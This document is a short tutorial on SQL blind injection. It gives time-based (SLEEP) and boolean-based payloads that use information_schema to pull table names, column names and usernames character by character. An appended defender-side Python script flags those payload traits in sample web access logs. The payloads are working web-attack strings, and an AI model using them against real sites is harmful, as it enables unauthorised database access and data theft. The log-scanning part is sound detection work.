SQL blind injection: obtaining database table names, column names and data

1. Time-based blind injection

Get table names

```sql
id=1 AND IF(ASCII(SUBSTRING((SELECT table_name FROM information_schema.tables WHERE table_schema=DATABASE() LIMIT 1),1,1))=97, SLEEP(5), 0)
```

Get column names

```sql
id=1 AND IF(ASCII(SUBSTRING((SELECT column_name FROM information_schema.columns WHERE table_name='users' LIMIT 1),1,1))=117, SLEEP(5), 0)
```

Get data

```sql
id=1 AND IF(ASCII(SUBSTRING((SELECT username FROM users LIMIT 1),1,1))=97, SLEEP(5), 0)
```

2. Boolean-based blind injection

Get table names

```sql
id=1 AND (SELECT SUBSTRING(table_name,1,1) FROM information_schema.tables WHERE table_schema=DATABASE() LIMIT 1)='a'
```

Get column names

```sql
id=1 AND (SELECT SUBSTRING(column_name,1,1) FROM information_schema.columns WHERE table_name='users' LIMIT 1)='u'
```

Get data

```sql
id=1 AND (SELECT SUBSTRING(username,1,1) FROM users LIMIT 1)='a'
```

Procedure

Get table names, get column names, get data.

Use boolean-based or time-based blind injection to infer the table names, column names and data one character at a time.

```sql
id=1 AND ASCII(SUBSTRING((SELECT table_name FROM information_schema.tables WHERE table_schema=DATABASE() LIMIT 1 OFFSET 0),1,1))=97
```

```sql
id=1 AND ASCII(SUBSTRING((SELECT column_name FROM information_schema.columns WHERE table_name='users' LIMIT 1 OFFSET 0),1,1))=117
```

```sql
id=1 AND ASCII(SUBSTRING((SELECT username FROM users LIMIT 1 OFFSET 0),1,1))=97
```
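
As an added defender-side example (not part of the original post), the Python below scans web-server access-log lines for the three payload traits shown above: a SLEEP() call, a SUBSTRING() compared against one character or ASCII code, and lookups in information_schema. The log lines are constructed samples, and the rule names and the `classify_request`/`scan_log` functions are my own.

```python
import re
from urllib.parse import unquote_plus, urlsplit

# Constructed sample access-log lines (not taken from the page). The query strings
# carry the payload shapes the page lists, URL-encoded as a client would send them.
SAMPLE_LOG = """\
10.0.0.5 - - [01/Jan/2024:10:00:00 +0000] "GET /item.php?id=1 HTTP/1.1" 200 512
10.0.0.5 - - [01/Jan/2024:10:00:01 +0000] "GET /item.php?id=1+AND+IF(ASCII(SUBSTRING((SELECT+table_name+FROM+information_schema.tables+WHERE+table_schema%3DDATABASE()+LIMIT+1),1,1))%3D97,+SLEEP(5),+0) HTTP/1.1" 200 512
10.0.0.5 - - [01/Jan/2024:10:00:07 +0000] "GET /item.php?id=1+AND+(SELECT+SUBSTRING(username,1,1)+FROM+users+LIMIT+1)%3D%27a%27 HTTP/1.1" 200 512
10.0.0.5 - - [01/Jan/2024:10:00:08 +0000] "GET /item.php?id=1%20AND%20ASCII(SUBSTRING((SELECT%20column_name%20FROM%20information_schema.columns%20WHERE%20table_name%3D%27users%27%20LIMIT%201%20OFFSET%200),1,1))%3D117 HTTP/1.1" 200 512
10.0.0.5 - - [01/Jan/2024:10:00:09 +0000] "GET /search.php?q=sleeping+bags HTTP/1.1" 200 2048
"""

# Each rule matches one trait of the payloads above; matching runs on the URL-decoded query string.
RULES = {
    # IF(..., SLEEP(n), 0): the time-based variant, where the delay is the signal
    "time-based": re.compile(r"\bSLEEP\s*\(", re.I),
    # ASCII(SUBSTRING(...))=<n> or SUBSTRING(...)='<c>': one character inferred per request
    "char-inference": re.compile(r"\bSUBSTRING\s*\(.*\)\s*=\s*(?:\d+|'.')", re.I),
    # table/column names enumerated through the metadata schema
    "schema-enumeration": re.compile(r"\binformation_schema\.(?:tables|columns)\b", re.I),
}

REQUEST_LINE = re.compile(r'"(?:GET|POST)\s+(\S+)\s+HTTP/')


def classify_request(target: str) -> frozenset:
    """Return the names of all rules whose pattern appears in the decoded query string."""
    query = unquote_plus(urlsplit(target).query)
    return frozenset(name for name, rx in RULES.items() if rx.search(query))


def scan_log(log_text: str):
    """Return [(line_no, tags)] for every log line whose request matches at least one rule."""
    hits = []
    for line_no, line in enumerate(log_text.splitlines(), start=1):
        m = REQUEST_LINE.search(line)
        if not m:
            continue
        tags = classify_request(m.group(1))
        if tags:
            hits.append((line_no, tags))
    return hits


if __name__ == "__main__":
    for line_no, tags in scan_log(SAMPLE_LOG):
        print(f"line {line_no}: {', '.join(sorted(tags))}")
```

The word-boundary and `(` in the SLEEP rule keep an ordinary search for "sleeping bags" (last sample line) from being flagged; pair the time-based hit with the request's own response time in the log for confirmation.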
